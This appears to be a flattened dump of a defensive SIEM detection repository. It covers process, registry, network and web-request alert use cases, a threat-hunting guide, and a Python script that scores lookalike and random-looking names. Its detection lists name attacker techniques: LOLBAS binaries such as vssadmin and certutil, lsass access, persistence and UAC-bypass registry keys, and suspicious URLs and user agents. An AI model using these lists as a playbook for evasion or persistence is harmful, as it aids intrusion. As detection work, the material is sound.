- Source System, Destination System, Protocol=UDP where Destination System Count exceeds threshold
- Source System, Protocol=TCP where Count exceeds threshold
- Destination System, Protocol=TCP where Count exceeds threshold
- Bytes In Total, Bytes Out Total, Bytes In/Out Ratio where Bytes In/Out Ratio exceeds threshold
- Connection Length where Connection Length exceeds threshold

# Log Source Examples
- Sysmon Event ID 3: Network connection detected

# Possible False Positives

-------------------------------------------------------------------------------- /Tactics/Network-Full-Packet-Capture.md: --------------------------------------------------------------------------------

# Network Activity by Full Packet Capture Use Cases

Grouped by [Detection Method](/Detection-Methods.md)

## Aggregate Count

## Blacklist Alert
- Certificate Expired
- Certificate is Self-Signed
- Certificate Algorithm is Weak
- Certificate Validity Exceeds 3 Years
- Certificate Common Name Has no Periods
- Certificate With Blank Fields

## Whitelist Alert
- Certificate with Invalid Country Code/State

## Levenshtein Score Alert

## Rolling Whitelist Alert

## Shannon Entropy Score Alert

## Threshold Alert

# Log Source Examples
- Network IDS Logs
- Layer 7 Firewall Logs

# Possible False Positives

-------------------------------------------------------------------------------- /Tactics/Process-Access.md: --------------------------------------------------------------------------------

# Process Access Use Cases

Grouped by [Detection Method](/Detection-Methods.md)

Observe general process behavior with the goal of understanding normal and detecting anomalies. Use of multiple visualizations, tables, and aggregation methods is recommended. Any confirmed malicious behavior from this use case should be considered as a foundation for a new alert.

## Aggregate Count

## Blacklist Alert
- Process accesses %WINDIR%\System32\lsass.exe

## Whitelist Alert

## Levenshtein Score Alert

## Rolling Whitelist Alert
- Newly observed Source Process and Destination Process

## Shannon Entropy Score Alert

## Threshold Alert

# Log Source Examples
- Sysmon Event ID 10: Process accessed

# Possible False Positives

-------------------------------------------------------------------------------- /Tactics/Process-Execution.md: --------------------------------------------------------------------------------

# Process Execution Use Cases

This use case is purposefully separated from commandline activity. These detections assume you have all process execution details other than the command line (process name, PID, full path, parent process, owner, etc.).

Grouped by [Detection Method](/Detection-Methods.md)

MITRE ATT&CK Framework:

- Observe general process execution with the goal of understanding normal and detecting anomalies. Use of multiple visualizations, tables, and aggregation methods is recommended. Any confirmed malicious behavior from this use case should be considered as a foundation for a new alert.

## Match Alert
- Alternate Data Stream Use
  - Process command line contains the regex `\.[\w]+:` (a file extension followed by a colon, as in `file.txt:payload.exe`)

- Execution of Sysinternals processes (include name.exe and name64.exe variants)
  - pslist.exe
  - psservice.exe
  - psexec.exe
  - psgetsid.exe
  - pskill.exe
  - pkill.exe
  - psloggedon.exe
  - psfile.exe
  - PipeList.exe
  - AccessChk.exe
  - AccessEnum.exe
  - LogonSessions.exe
  - PsLogList.exe
  - PsInfo.exe
  - PsPasswd.exe
  - ru.exe
  - procdump.exe
  - ShellRunas.exe
  - LoadOrd.exe
  - LoadOrdC.exe
  - regsize.exe

- Unexpected invocation of system executables (LOLBAS). The technique IDs are the ones the list was written against; several have since been deprecated or merged in ATT&CK (for example T1086 PowerShell is now T1059.001, T1088 Bypass UAC is now T1548.002, and T1015 Accessibility Features is now T1546.008).
  - appcmd.exe (t1218)
  - at.exe
  - atbroker.exe (t1015)
  - attrib.exe (t1158)
  - bash.exe (t1202)
  - bitsadmin.exe (t1197)
  - certutil.exe (t1202)
  - cscript.exe (T1202)
  - cmdkey.exe (t1087)
  - compmgmtlauncher.exe (TA0007)
  - computerdefaults.exe (t1088)
  - control.exe (t1202)
  - dcsync.exe
  - dism.exe (t1088)
  - displayswitch.exe (t1015)
  - esentutl.exe (t1003)
  - find.exe (TA0007)
  - findstr.exe (t1081)
  - fodhelper.exe (t1088)
  - forfiles.exe (t1222)
  - fsutil.exe (TA0007)
  - hh.exe (t1223)
  - hostname.exe (TA0007)
  - icacls.exe (t1222)
  - ipconfig.exe (TA0007)
  - jjs.exe (t1218)
  - klist.exe (t1087, pass-the-ticket)
  - magnify.exe (t1015)
  - makecab.exe
  - mofcomp.exe (t1047)
  - MSBuild.exe (T1127)
  - mshta.exe (t1170)
  - narrator.exe (t1015)
  - nbtstat.exe (t1016)
  - net.exe (TA0007)
  - net1.exe (TA0007)
  - netsh.exe (t1063)
  - netstat.exe (t1049)
  - nltest.exe (t1033)
  - nslookup.exe (t1016)
  - odbcconf.exe (t1073)
  - osk.exe (t1015)
  - pcalua.exe (t1202)
  - ping.exe (TA0007)
  - powershell.exe (T1086)
  - powershell_ise.exe (T1086)
  - psexec.exe
  - psexesvc.exe
  - qprocess.exe (t1057)
  - query.exe (t1057)
  - quser.exe (t1033)
  - qwinsta.exe (t1057)
  - reg.exe (t1112)
  - regasm.exe (t1121)
  - regsvcs.exe (t1121)
  - regsvr32.exe (t1117)
  - replace.exe (t1218)
  - robocopy.exe (t1074)
  - route.exe (t1016)
  - runas.exe (t1134)
  - rwinsta.exe (t1057)
  - sc.exe (t1031)
  - schtasks.exe (t1053)
  - scrcons.exe (t1047) (parent process of WMI ActiveScriptEventConsumers)
  - sdbinst.exe (t1138)
  - set.exe (TA0007)
  - sethc.exe (t1015)
  - syncappvpublishingserver.exe (t1218)
  - systeminfo.exe (t1033)
  - takeown.exe (t1222)
  - taskeng.exe (t1053)
  - taskkill.exe (t1112)
  - tasklist.exe (t1057)
  - time.exe (TA0007)
  - tracert.exe (TA0007)
  - tree.com (t1016)
  - utilman.exe (t1015)
  - vds.exe (TA0007)
  - vdsldr.exe (TA0007)
  - ver.exe (TA0007)
  - vssadmin.exe (t1490)
  - wevtutil.exe (t1070)
  - where.exe (t1081)
  - whoami.exe (t1033)
  - winrm.cmd (t1028)
  - winrs.exe (t1202)
  - winrshost.exe (TA0007)
  - winver.exe (TA0007)
  - wmic.exe (TA0007)
  - wmiprvse.exe (t1047)
  - wscript.exe (T1202)
  - wsmprovhost.exe (t1028)
  - wusa.exe
  - xcopy.exe (t1074)

- System process with suspicious starting location
  - backgroundTaskHost.exe not starting from c:\windows\system32\
  - CompPkgSrv.exe not starting from c:\windows\system32\
  - conhost.exe not starting from c:\windows\system32\
  - csrss.exe not starting from c:\windows\system32\
  - ctfmon.exe not starting from c:\windows\system32\
  - dasHost.exe not starting from c:\windows\system32\
  - dllhost.exe not starting from c:\windows\system32\
  - dwm.exe not starting from c:\windows\system32\
  - explorer.exe not starting from c:\windows\
  - iexplore.exe not starting from c:\program files\internet explorer\
  - lsass.exe not starting from c:\windows\system32\
  - ntoskrnl.exe not starting from c:\windows\system32\
  - RuntimeBroker.exe not starting from c:\windows\system32\
  - services.exe not starting from c:\windows\system32\
  - splwow64.exe not starting from c:\windows\
  - svchost.exe not starting from c:\windows\system32\
  - taskhostw.exe not starting from c:\windows\system32\
  - taskmgr.exe not starting from c:\windows\system32\
  - wininit.exe not starting from c:\windows\system32\
  - winlogon.exe not starting from c:\windows\system32\

- System process with suspicious parent process
  - taskhost.exe with a parent other than services.exe
  - lsass.exe with a parent other than wininit.exe
  - iexplore.exe with a parent other than explorer.exe
  - explorer.exe with a parent other than userinit.exe
  - winlogon.exe with a parent other than smss.exe
  - wininit.exe with a parent other than smss.exe
  - smss.exe with a parent process other than System
  - csrss.exe with a parent other than smss.exe
  - services.exe with a parent other than wininit.exe
  - svchost.exe with a parent other than services.exe
  - lsm.exe with a parent other than wininit.exe
  - eventvwr.exe spawning a child process other than mmc.exe (T1088; eventvwr.exe is the launcher, so an unexpected child is the UAC bypass, not an unexpected parent)
  - wmiprvse.exe with a parent process other than svchost.exe

- System process with suspicious owner
  - csrss.exe with an owner other than Local System
  - smss.exe with an owner other than Local System
  - services.exe with an owner other than Local System
  - wininit.exe with an owner other than Local System
  - lsass.exe with an owner other than Local System
  - lsm.exe with an owner other than Local System
  - winlogon.exe with an owner other than Local System

- Microsoft process name without digital signature
  - svchost.exe
  - services.exe
  - smss.exe
  - lsass.exe
  - csrss.exe
  - wininit.exe
  - taskhostw.exe
  - runtimebroker.exe

- Executable running from $Recycle.Bin
- Executable running from \System Volume Information
- Executable running from \Temp folders

## Aggregate Count
- Suspicious child process of system executables
  - notepad.exe
  - regsvr32.exe
  - rundll32.exe
  - mshta.exe

## Blacklist Alert
- Executables masquerading as c:\windows system files running from bad paths (blacklist of processes expected in c:\windows\)
- Executables masquerading as c:\windows\system32 system files running from bad paths (blacklist of processes expected in c:\windows\system32\)
- Executables running from any folder with TEMP in the path

- Administrator account running "daily use" applications (blacklist of admin names)
  - chrome.exe
  - iexplore.exe
  - MicrosoftEdge.exe
  - msedge.exe
  - firefox.exe
  - brave.exe

- cmd.exe with the following parent names (a web server worker spawning a shell is the classic web shell signature; WMI spawning one is remote WMI command execution)
  - w3wp.exe
  - wmiprvse.exe

- powershell*.exe with a parent process of
  - w3wp.exe
  - wmiprvse.exe

## Whitelist Alert
- A file with a non-executable extension is executed (whitelist of extensions)
  - bat, bin, cmd, com, cpl, exe, gadget, inf, ins, inx, isu, job, jse, lnk, msc, msi, msp, mst, paf, pif, ps1, reg, rgs, scr, sct, shb, shs, u3p, vb, vbe, vbs, vbscript, ws, wsf, wsh

- Unexpected process from a non-admin/helpdesk/developer account (whitelist of admins, etc.)
  - ipconfig.exe (T1016)
  - powershell.exe (T1086)
  - powershell_ise.exe (T1086)
  - net.exe (T1018)
  - mstsc.exe
  - python*.exe

- Unexpected child process where the source (parent) process is an Office product (T1137)
  - excel.exe
  - winword.exe
  - powerpnt.exe
  - outlook.exe
  - msaccess.exe
  - mspub.exe

- Unrecognized processes with owner of 'NT AUTHORITY\SYSTEM' (whitelist of expected full process paths)
- Unrecognized processes with owner of 'NETWORK SERVICE' (whitelist of expected full process paths)

- Unrecognized process starting from c:\windows\ (T1036) (whitelist of processes expected)
  - `Get-ChildItem c:\windows\*.exe | select name`
- Unrecognized process starting from c:\windows\system32\ (T1036) (whitelist of processes expected)
  - `Get-ChildItem c:\windows\system32\*.exe | select name`
- Unrecognized process starting from c:\windows\winsxs\ (T1036) (whitelist of processes expected)
  - `Get-ChildItem c:\windows\winsxs\*.exe | group-object | select name`

- SYSTEM account launching processes other than
  - (WIP)

## Levenshtein Score Alert
- Processes with filenames that closely resemble system files.

## Rolling Whitelist Alert
- Source Process=cmd.exe, Newly observed Child Process
- Source Process=powershell.exe, Newly observed Child Process
- Source Process=powershell_ise.exe, Newly observed Child Process
- Executing items on list [LOLBAS](https://github.com/LOLBAS-Project/LOLBAS), Newly observed User
- Source Process Path=c:\windows\, newly observed process
- Source Process Path=c:\windows\system32\, newly observed process
- Source Process Path=c:\windows\syswow64\, newly observed process
- Source Process Path=c:\windows\fonts\, newly observed process
- Source Process Path=C:\$Recycle.Bin\, newly observed process
- Source Process Path=c:\system volume information\, newly observed process
- Source Process Path=C:\ProgramData\, newly observed process
- Source Process=wmiprvse.exe, newly observed child process

## Shannon Entropy Score Alert
- Processes executed with randomized file names.

## Threshold Alert
- Command Length where Command Length exceeds threshold

# Log Source Examples
- Windows Security Event ID 4688: A new process has been created
  - secpol.msc > Advanced Audit Policy Configuration > System Audit Policies > Detailed Tracking > Audit Process Creation: Enabled, Success
  - gpedit.msc > Computer Configuration > Administrative Templates > System > Audit Process Creation > Include command line in process creation events: Enabled
- Sysmon Event ID 1: Process creation

# Possible False Positives
- Generally a lot of false positives can be expected from this log source. Understanding operating system, trusted application, user and business norms is what tunes the noise down over time.

# Resources
- https://www.fireeye.com/content/dam/fireeye-www/blog/pdfs/dosfuscation-report.pdf
- https://lolbas-project.github.io

-------------------------------------------------------------------------------- /Tactics/Registry-Creation.md: --------------------------------------------------------------------------------

# Registry Creation Use Cases

Grouped by [Detection Method](/Detection-Methods.md)

## Match Alert
- Startup items
  - "HKU\{SID}\Software\Microsoft\Windows\CurrentVersion\Run"
  - "HKU\{SID}\Software\Microsoft\Windows\CurrentVersion\RunOnce"
  - "HKU\{SID}\Software\Microsoft\Windows\CurrentVersion\RunOnceEx"
  - "HKU\{SID}\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run"
  - "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run"
  - "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce"
  - "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnceEx"
  - "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run"
  - "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit"

- Services
  - "HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services"
  - "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce"
  - "HKU\{SID}\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce"
  - "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices"
  - "HKU\{SID}\Software\Microsoft\Windows\CurrentVersion\RunServices"

- UAC bypass
  - "HKU\*\Software\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA"
  - "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA"

- Others
  - "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell"
  - "HKU\{SID}\Software\Microsoft\Windows NT\CurrentVersion\Windows"
  - "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\"
  - "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\"
  - "HKU\{SID}\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders"
  - "HKU\{SID}\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders"
  - "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders"
  - "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders"

## Aggregate Count

## Blacklist Alert

## Whitelist Alert

## Levenshtein Score Alert

## Rolling Whitelist Alert

## Shannon Entropy Score Alert

## Threshold Alert

# Log Source Examples

# Possible False Positives

-------------------------------------------------------------------------------- /Tactics/Registry-Modification.md: --------------------------------------------------------------------------------

# Registry Modification Use Cases

Grouped by [Detection Method](/Detection-Methods.md)

## Aggregate Count

## Blacklist Alert
- "HKU\{SID}\Software\Microsoft\Windows\CurrentVersion\Run"
- "HKU\{SID}\Software\Microsoft\Windows\CurrentVersion\RunOnce"
- "HKU\{SID}\Software\Microsoft\Windows\CurrentVersion\RunOnceEx"
- "HKLM\Software\Microsoft\Windows\CurrentVersion\Run"
- "HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce"
- "HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnceEx"
- "HKU\{SID}\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders"
- "HKU\{SID}\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders"
- "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders"
- "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders"
- "HKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce"
- "HKU\{SID}\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce"
- "HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices"
- "HKU\{SID}\Software\Microsoft\Windows\CurrentVersion\RunServices"
- "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run"
- "HKU\{SID}\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run"
- "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit"
- "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell"
- "HKU\{SID}\Software\Microsoft\Windows NT\CurrentVersion\Windows"

## Whitelist Alert

## Levenshtein Score Alert

## Rolling Whitelist Alert

## Shannon Entropy Score Alert

## Threshold Alert

# Log Source Examples

# Possible False Positives

-------------------------------------------------------------------------------- /Tactics/Resource-Consumption.md: --------------------------------------------------------------------------------

# Resource Consumption Use Cases

Grouped by [Detection Method](/Detection-Methods.md)

## Aggregate Count

## Blacklist Alert

## Whitelist Alert

## Levenshtein Score Alert

## Rolling Whitelist Alert

## Shannon Entropy Score Alert

## Threshold Alert
- High CPU/Memory Usage over X Minutes

# Log Source Examples

# Possible False Positives

-------------------------------------------------------------------------------- /Tactics/Scheduled-Task-Creation.md: --------------------------------------------------------------------------------

# Scheduled Task Creation Use Cases

Grouped by [Detection Method](/Detection-Methods.md)

MITRE ATT&CK Framework: [Scheduled Task/Job (T1053)](https://attack.mitre.org/techniques/T1053/), [Scheduled Task (T1053.005)](https://attack.mitre.org/techniques/T1053/005/)

## Match Alert

## Aggregate Count

## Blacklist Alert

## Whitelist Alert
- Anomalous Scheduled Task Creator

## Levenshtein Score Alert

## Rolling Whitelist Alert
- Newly observed Scheduled Task Name

## Shannon Entropy Score Alert

## Threshold Alert

# Log Source Examples
- Windows Security Event ID 4698: A scheduled task was created

# Possible False Positives

-------------------------------------------------------------------------------- /Tactics/Service-Creation.md: --------------------------------------------------------------------------------

# Service Creation Use Cases

Grouped by [Detection Method](/Detection-Methods.md)

MITRE ATT&CK Framework: [New Service (T1050)](https://attack.mitre.org/techniques/T1050/), [Service Execution (T1035)](https://attack.mitre.org/techniques/T1035/)

- Service creation can be used by an adversary to achieve persistence.

## Aggregate Count

## Blacklist Alert

## Whitelist Alert
- Anomalous Services

## Levenshtein Score Alert

## Rolling Whitelist Alert
- Newly observed Service File Name, Service Account

## Shannon Entropy Score Alert

## Threshold Alert

# Log Source Examples
- Windows Security Event ID 4697: A service was installed in the system (requires the Security System Extension audit subcategory)
- Windows System Event ID 7045: A service was installed in the system (logged by the Service Control Manager without extra audit configuration)

# Possible False Positives

-------------------------------------------------------------------------------- /Tactics/Service-Modification.md: --------------------------------------------------------------------------------

# Service Modification Use Cases

Grouped by [Detection Method](/Detection-Methods.md)

MITRE ATT&CK Framework: [Modify Existing Service (T1031)](https://attack.mitre.org/techniques/T1031/)

- Service modification can be used by an adversary to achieve persistence.

## Aggregate Count

## Blacklist Alert

## Whitelist Alert

## Levenshtein Score Alert

## Rolling Whitelist Alert
- Newly observed Source User

## Shannon Entropy Score Alert

## Threshold Alert

# Log Source Examples
- AWS CloudTrail
- Azure
- GCP

# Possible False Positives

-------------------------------------------------------------------------------- /Tactics/Web-Request.md: --------------------------------------------------------------------------------

# Web Request Use Cases

Grouped by [Detection Method](/Detection-Methods.md)

## Aggregate Count
- HTTP GET Method Counts
- HTTP POST Method Counts
- User Agent String Counts
- Allow:Block Ratio per System/User
- GET:POST Ratio per System/User
- Up:Down Bytes Ratio per System/User
- Newly-Registered Domains Visited (requires WHOIS enrichment)

## Blacklist Alert
- URL containing "/etc/"
- URL containing "/system32/"
- URL containing "cmd.exe"
- URL containing "command.exe"
- URL containing "powershell.exe"
- URL containing an IP Address
- HTTPS request whose logged URL contains a path (3 or more "/"): without break-and-inspect the proxy only sees the host name of a TLS session, so a full path means plaintext HTTP on port 443
- Known-bad User Agents
- Suspicious User Agents
  - Contains "curl"
  - Contains "python"
  - Contains "Go-http-client"
  - Contains "wget"
- Known-bad Domains
- A privileged account generates any web traffic
- A service account generates any web traffic
- A system account generates any web traffic
- User Agent string containing 'Nmap'
- User Agent string containing 'pangolin'
- User Agent string containing 'FHScan Core'
- User Agent string containing 'DominoHunter'
- User Agent string containing 'Grabber'
- User Agent string containing 'CZ32ts' or 'czxt2s'

## Whitelist Alert
- Newly Observed Domains
- Web Traffic to Domains not in "Top Million" Lists

## Levenshtein Score Alert
- Typosquatting company and trusted domains

## Rolling Whitelist Alert
- Newly Observed User Agent

## Shannon Entropy Score Alert
- High Entropy Domain Name

## Threshold Alert
- User Name, Request URL Host, Bytes Out Total where Bytes Out Total exceeds threshold
- User Name, Allow Count, Block Count, Allow/Block Ratio where Allow/Block Ratio exceeds threshold
- User Name, GET Total, POST+PUT Total, GET:POST/PUT Ratio where GET:POST/PUT Ratio exceeds threshold
- User Name, Bytes In Total, Bytes Out Total, Bytes In/Out Ratio where Bytes In/Out Ratio exceeds threshold

# Log Source Examples

# Possible False Positives
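The two scoring methods the library reuses across tactics, the Levenshtein Score Alert ("Processes with filenames that closely resemble system files" under Process Execution, "Typosquatting company and trusted domains" under Web Request) and the Shannon Entropy Score Alert ("Processes executed with randomized file names", "High Entropy Domain Name"), implemented once and applied both to process image paths and to requested host names. This is an added example rather than code from the SIEM repository; the system-process and trusted-domain reference sets, the sample image paths and host names, and the distance and entropy thresholds are constructed for the demonstration and would be replaced with an inventory of real system binaries and the organisation's own domains.

```python
"""Levenshtein and Shannon-entropy scoring for process names and domains."""
import math
from collections import Counter

# Reference sets are constructed for this example; in production they come from
# an inventory of the host's real system binaries and the company's own domains.
SYSTEM_PROCESSES = {"svchost.exe", "lsass.exe", "csrss.exe", "services.exe",
                    "wininit.exe", "winlogon.exe", "explorer.exe", "smss.exe"}
TRUSTED_DOMAINS = {"example.com", "login.example.com"}

LEVENSHTEIN_MAX = 2   # one or two edits away from a known name counts as "similar" (assumed)
ENTROPY_MIN = 3.5     # bits per character; long legitimate names can cross it, so tune it (assumed)
ENTROPY_MIN_LEN = 8   # short strings cannot reach high entropy anyway (assumed)


def levenshtein(a: str, b: str) -> int:
    """Edit distance (insert, delete, substitute) between two strings."""
    if len(a) < len(b):
        a, b = b, a
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def shannon_entropy(s: str) -> float:
    """Bits per character; log2(len(s)) is the ceiling for a string of that length."""
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values()) if n else 0.0


def closest(name, references):
    """(distance, reference) of the nearest reference string by edit distance."""
    return min((levenshtein(name, r), r) for r in references)


def score_name(name, references, stem):
    """Finding for a lookalike or randomized name, or None when it looks normal."""
    if name in references:
        return None  # an exact match is the path/parent rules' job, not a scoring rule's
    distance, ref = closest(name, references)
    if distance <= LEVENSHTEIN_MAX:
        return {"name": name, "method": "levenshtein", "similar_to": ref, "score": distance}
    if len(stem) >= ENTROPY_MIN_LEN and shannon_entropy(stem) >= ENTROPY_MIN:
        return {"name": name, "method": "entropy", "score": round(shannon_entropy(stem), 2)}
    return None


def score_process(image: str):
    """Score the file name of a process image path (Sysmon 1 / 4688 Image field)."""
    name = image.replace("/", "\\").rsplit("\\", 1)[-1].lower()
    return score_name(name, SYSTEM_PROCESSES, name.rsplit(".", 1)[0])


def score_domain(host: str):
    """Score a requested host name; entropy is taken over the leftmost label only."""
    host = host.lower().rstrip(".")
    return score_name(host, TRUSTED_DOMAINS, host.split(".", 1)[0])


# Constructed sample: image paths as logged by Sysmon 1 / 4688, hosts from proxy logs.
SAMPLE_IMAGES = [
    r"C:\Windows\System32\svchost.exe",               # real system binary
    r"C:\Users\bob\AppData\Local\Temp\svch0st.exe",   # one substitution
    r"C:\ProgramData\scvhost.exe",                    # two substitutions (transposition)
    r"C:\Users\bob\Downloads\xk9q2zt7mfe4.exe",       # randomized name
    r"C:\Program Files\Vendor\updater.exe",           # ordinary third-party name
]
SAMPLE_HOSTS = ["login.example.com", "1ogin.example.com", "examp1e.com",
                "q7zk2x9m4vp1.net", "github.com"]


def run():
    """(process findings, domain findings) over the constructed samples."""
    return ([f for f in map(score_process, SAMPLE_IMAGES) if f],
            [f for f in map(score_domain, SAMPLE_HOSTS) if f])


if __name__ == "__main__":
    for finding in run()[0] + run()[1]:
        print(finding)
```

Exact matches are skipped on purpose: a genuine `svchost.exe` running from the wrong directory belongs to the path and parent rules under Process Execution, while scoring exists to catch names that are not on any list. Because entropy is bounded by log2 of the string length, a long benign name can exceed the 3.5-bit line, so the entropy rule is meant to run behind a whitelist of names already observed in the environment rather than raw.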
/Tactics/Web-Server.md: -------------------------------------------------------------------------------- 1 | # Web Server Use Cases 2 | 3 | 4 | Grouped by [Detection Method](/Detection-Methods.md) 5 | 6 | 7 | ## Aggregate Count 8 | - HTTP GET Method Counts 9 | - HTTP POST Method Counts 10 | - User Agent String Counts 11 | - Allow:Block Ratio per System/User 12 | - GET:POST Ratio per System/User 13 | - Up:Down Bytes Ratio per System/User 14 | 15 | 16 | ## Blacklist Alert 17 | - URL containing "/etc/" 18 | - URL containing "/system32/" 19 | - URL containing "cmd.exe" 20 | - URL containing "command.exe" 21 | - URL containing "powershell.exe" 22 | - URL containing an IP Address 23 | - HTTPS request with 3 or more / (when no break-and-inspect is deployed, this signifies HTTP over port 443) 24 | - Known-bad User Agents 25 | - Suspicious User Agents 26 | - Contains "curl" 27 | - Contains "python" 28 | - Contains "Go-http-client" 29 | - Contains "wget" 30 | - User Agent string containing 'Nmap' 31 | 32 | 33 | ## Whitelist Alert 34 | 35 | 36 | ## Levenshtein Score Alert 37 | 38 | 39 | ## Rolling Whitelist Alert 40 | - Newly Observed User Agent 41 | 42 | 43 | ## Shannon Entropy Score Alert 44 | 45 | 46 | 47 | ## Threshold Alert 48 | 49 | 50 | # Log Source Examples 51 | 52 | 53 | # Possible False Positives 54 | -------------------------------------------------------------------------------- /Threat-Hunting.md: -------------------------------------------------------------------------------- 1 | 2 | # Threat Hunting 3 | The main goals of threat hunting are to 4 | - detect compromises that existing systems failed to detect. 5 | - minimize the impact of breaches by shrinking the breach detection gap. 6 | - convert hunts into automated detections. 7 | 8 | Other benefits of threat hunting are: 9 | - Identification of gaps in visibility necessary to detect and respond to a specific attacker TTP. 10 | - Identification of gaps in detection. 
11 | - Development of new monitoring use cases and detection analytics. 12 | - Uncovering new threats and TTPs that feed back into the threat intelligence process. 13 | - Recommendations on new preventive measures. 14 | 15 | Threat hunting should focus on events outside the traditional detection capabilities, and may uncover missed or misinterpreted events during the hunt that can be used to improve detection and further train analysts. Threat hunting assumes that there already was a breach and that it has not been identified yet. 16 | 17 | # Models 18 | - Hypothesis-Driven 19 | - A supposition is made about potential threats and their activities that may be present on the organization’s network, then data and analysis are used to confirm or deny the suspicion. 20 | - Intel-Driven 21 | - Threat intelligence supplies the TTPs and capabilities of known actors, and the hunt looks for evidence of those TTPs in the environment. In turn, a hunt may uncover TTPs that have not yet been identified or disclosed, so hunting both consumes and generates threat intelligence. 22 | - Baseline Hunts 23 | - A proactive approach to threat detection that involves setting up a baseline of normal activity, monitoring that baseline for deviations, and investigating any suspicious activity. 24 | - Custom/on-demand 25 | - A hunt scoped to a specific request (an incident, an audit finding, a new asset) rather than to a recurring model. 26 | # Techniques 27 | - Indicator Search 28 | - Stack Counting (total count-based, AKA long-tail analysis) 29 | - Clustering (time-based counting) 30 | - Grouping (e.g. group up endpoints, then use other techniques) 31 | - Ratios (e.g.
request/response, upload/download, success/failure) 32 | - Standard deviation 33 | 34 | # Frameworks 35 | - MITRE ATT&CK 36 | - Targeted Hunting integrating Threat Intelligence (TaHiTI) 37 | - Splunk's PEAK (Prepare, Execute, and Act with Knowledge) 38 | 39 | # Hunting Phases 40 | ## Planning Phase 41 | - Develop a hypothesis / Identify impactful intelligence / Establish a baseline 42 | - Research the involved technologies, tactics, techniques, threat actors 43 | - Determine relevant data sources 44 | - Determine scope of time 45 | - Plan the hunt 46 | 47 | ## Execution Phase 48 | - Query data sources 49 | - Ensure data/results are clean 50 | - Investigate/Analyze 51 | - Escalate any critical findings immediately 52 | - Test and refine hypothesis, if appropriate 53 | 54 | ## Action Phase 55 | - Document the hunt itself 56 | - Document findings 57 | - Create detections 58 | - Improve process 59 | - Report findings 60 | - Plan to redo hunt or scrap it 61 | 62 | General hypothesis examples: 63 | - An adversary achieved [tactic] via/to [technique]. 64 | - An adversary exploited the vulnerability described in [CVE/Vulnerability]. 65 | - [Group/Campaign] activity has compromised an endpoint. 66 | - A(n) [Type] account has been compromised. 67 | - An adversary is using covert channels based on [protocol] to exfiltrate data from the organization. 68 | - An adversary is leveraging [software] to automatically exfiltrate sensitive data from the organization. 69 | - An adversary is leveraging [hardware] to automatically exfiltrate sensitive data from the organization. 70 | - An adversary is using existing user accounts for lateral movement. 71 | - An adversary is leveraging web shells to retain access to the infrastructure. 72 | - An adversary is using malware with filenames that are similar to existing system binaries to avoid detection. 73 | - An adversary is using fileless malware based on memory injections to avoid detection of malware on disk. 
74 | - An adversary is using persistence mechanisms without adding files to the operating system. 75 | - An adversary is using Kerberoasting attack techniques to obtain valid credentials. 76 | 77 | 78 | 79 | 80 | # Resources 81 | - https://hackforlab.com/threat-hunting-scenario/ 82 | - https://www.threathunting.net/files/hunt-evil-practical-guide-threat-hunting.pdf 83 | - https://www.betaalvereniging.nl/en/safety/tahiti/ 84 | - https://securityintelligence.com/posts/threat-hunting-guide/ 85 | - https://www.ibm.com/topics/threat-hunting 86 | -------------------------------------------------------------------------------- /Use-Case-Structure.md: -------------------------------------------------------------------------------- 1 | (AKA Playbook) 2 | 3 | # Executive Summary 4 | [Provide non-technical, high-level information, references, and background.] 5 | 6 | ## Name 7 | [Provide a succinct statement that describes what the Use Case addresses (e.g. Antivirus Detection Alert).] 8 | 9 | ## Problem Statement 10 | [Describe the problem, beginning with any necessary background information.] 11 | 12 | ## Objectives 13 | [Define the goals of the Use Case.] 14 | 15 | ## Compliance 16 | [List the Compliance Framework and individual checks/requirements the Use Case relates to in bulleted format.] 17 | 18 | ## MITRE ATT&CK Framework 19 | [List the MITRE ATT&CK Framework Tactics/Techniques the Use Case relates to in bulleted format.] 20 | 21 | ## Assumptions and Limitations 22 | [Describe any assumptions/limitations regarding law, licensing, policies, or technicalities.] 23 | 24 | # Analysis 25 | [Provide insights on the actions of and tools for those who are expected to monitor and respond.] 26 | 27 | ## Detection Validation 28 | [Describe expected paths that would lead to this Use Case being identified as 